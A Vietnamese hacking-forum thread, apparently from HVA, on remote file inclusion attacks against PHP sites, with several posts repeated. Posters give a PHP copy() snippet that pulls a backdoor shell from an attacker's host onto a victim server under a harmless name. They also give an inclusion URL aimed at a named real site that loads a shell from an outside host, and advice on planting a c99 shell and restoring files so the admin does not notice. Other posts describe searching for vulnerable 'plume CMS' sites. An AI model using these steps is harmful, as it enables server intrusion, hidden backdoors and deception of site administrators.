khổ wá ,copy làm 1 hàm của của PHP chứ không phải của *nix
đại loại là nếu 1 ứng dụng nào đó bị remote file include mà việc bạn include backdoor vào ko upload đc gì lên host victim ,thì bạn hãy include 1 file chứa hàm copy để copy con backdoor trên host của bạn về host của victim,tất nhiên folder của victim phải có quyền ghi
vd
http://site.com/index.php?file=http://host ko support php/hihi.php
nội dung file hihi.php
<?
copy("http://hostkosupportphp/remview.php","aboutme.php");
?>
lúc đó trên host của victim sẽ có con aboutme.php chính là con remview của chúng ta
căn bản là như thế 

khổ wá ,copy làm 1 hàm của của PHP chứ không phải của *nix
đại loại là nếu 1 ứng dụng nào đó bị remote file include mà việc bạn include backdoor vào ko upload đc gì lên host victim ,thì bạn hãy include 1 file chứa hàm copy để copy con backdoor trên host của bạn về host của victim,tất nhiên folder của victim phải có quyền ghi
vd
http://site.com/index.php?file=http://host ko support php/hihi.php
nội dung file hihi.php
<?
copy("http://hostkosupportphp/remview.php","aboutme.php");
?>
lúc đó trên host của victim sẽ có con aboutme.php chính là con remview của chúng ta
căn bản là như thế 

Warning:copy(http://freewebtown.com/tang05/fileremview)[function.copy]:failed to open stream:HTTP wrapper does not support writeable connections in /home/lonely/public_html/attacky.php on line 15

Code:

$ wget http://superb-east.dl.sourceforge.net/sourceforge/phpmyadmin/phpMyAdmin-2.6.3-pl1.tar.gz

Tải lên serv nặng quá dzậy lỡ bị timeout thì sao anh nhĩ ???

Sao ko tự viết 1 file php để select db nho nhỏ cần gì mà phải ôm luôn cái phpmyadmin kinh dzậy  

Ai biểu em nghe lời lão Lúc Lắc làm wé gì cơ chứ hix , cái lão này toàn lừa trẻ con không hà, toàn làm rối rắm vấn đề ra
Có 2 phương pháp nhanh ở việc này :
Change source của 1 file -> source con c99 đỡ phải copy(), (trước đó save cái file mình định change đã) có shell trên host rồi, up file mới là shell xịn của mình, dùng shell xịn change lại file cũ cho thèng admin 0 nghi ngờ
Cách 2 dùng hàm include shell (xem chi tiết bên vniss keke) 

http://bacaplume.free.fr/manager/frontinc/prepend.php?_PX_config[manager_path]=http://nhuy.hollosite.com/mshell.txt?

điều cần làm nhất bây giờ là giáo dục cho tụi nhỏ lòng tự trọng ! 

trang đó có mấy thằng turkey nó hack trước rồi , em cũng search theo từ khóa trong film "powered by plume CMS" nhưng không fải host nào cu~ng vô được !!! lâu lâu mới có cái được thôi a' , không biết "plume CMS" là 1 loai forum hay host của công ty nào đó cho thuê ??? theo kinh nghiệm của anh dinhcaohack thì cach dùng "include " để hack những host , huac forum bị lỗi thế nào hả anh ? cảm ơn anh nhiều nhiều lắ'm rất mong nhận được trả lời của anh .! 

Code:

Ai biểu em nghe lời lão Lúc Lắc làm wé gì cơ chứ hix  , cái lão này toàn lừa trẻ con không hà, toàn làm rối rắm vấn đề ra
Có 2 phương pháp nhanh ở việc này :
Change source của 1 file -> source con c99 đỡ phải copy(), (trước đó save cái file mình định change đã) có shell trên host rồi, up file mới là shell xịn của mình, dùng shell xịn change lại file cũ cho thèng admin 0 nghi ngờ
Cách 2 dùng hàm include shell (xem chi tiết bên vniss keke)

hô hô ... bạn dch nói chiện nghe huề vốn wá ,vniss ngoài cái trò local ra còn cái fVck gì đâu mà múa lửa ,đi đâu cũng vờnit ,vờnit !
ps:điều cần làm nhất bây giờ là giáo dục cho tụi nhỏ lòng tự trọng ! 

điều cần làm nhất bây giờ là giáo dục cho tụi nhỏ lòng tự trọng ! 

Riêng cái chuyện nói tục chửi bậy là không đủ .. tư cách rồi nhóc ạ

trang đó có mấy thằng turkey nó hack trước rồi , em cũng search theo từ khóa trong film "powered by plume CMS" nhưng không fải host nào cu~ng vô được !!! lâu lâu mới có cái được thôi a' , không biết "plume CMS" là 1 loai forum hay host của công ty nào đó cho thuê ??? theo kinh nghiệm của anh dinhcaohack thì cach dùng "include " để hack những host , huac forum bị lỗi thế nào hả anh ? cảm ơn anh nhiều nhiều lắ'm rất mong nhận được trả lời của anh .! 

Anh chưa thử xem video , anh nghĩ chắc cái "plume CMS" dính lỗi include PHP, có thể em không thực hành được là vì bug ấy .. có lâu rồi em ạ, muốn thực hành thì tốt thôi .. cứ 0h30' em ghé qua milw0rm xem có bug PHP Remote Include thì thực hành :">
Còn cái "dùng "include " để hack" không phải như em nghĩ đâu , đây là cách nhúng shell vào 1 file PHP trên host victim , wa vờ nít đi em, anh ngại type bên này lắm  

Anh chỉ nghĩ là, trước khi nghiên cứu về hacking nên trang bị cho mình đầy đủ các kiến thức căn bản đi đã.
Anh nghĩ em nên học một ngôn ngữ lập trình cho chắc đã. Bởi vì khi em nắm chắc, trong trường hợp này là PHP. Em sẽ ko cần phải hỏi han nhiều.
Mà bây giờ hỏi han chưa chắc em đã nắm được bản chất của vấn đề.
Topic này viết về Local Attack thì cũng ko nên quá đi xa về RFI, nếu muốn mọi người có thể mở 1 topic ra. Tránh việc để cho các bài viết HVA trở nên lộn xộn.
Cảm ơn. 

Designed: Le Nhat Nam - Security checked: xLuke & Hacked by quocboy  

Rõ hay nhỉ chỗ HVA là để khoe chiến tích các trang web đã bị hack hay sao mà mang ra đây khoe thế ?

Mấy cụ bên BQT sao lại sơ xuất thế này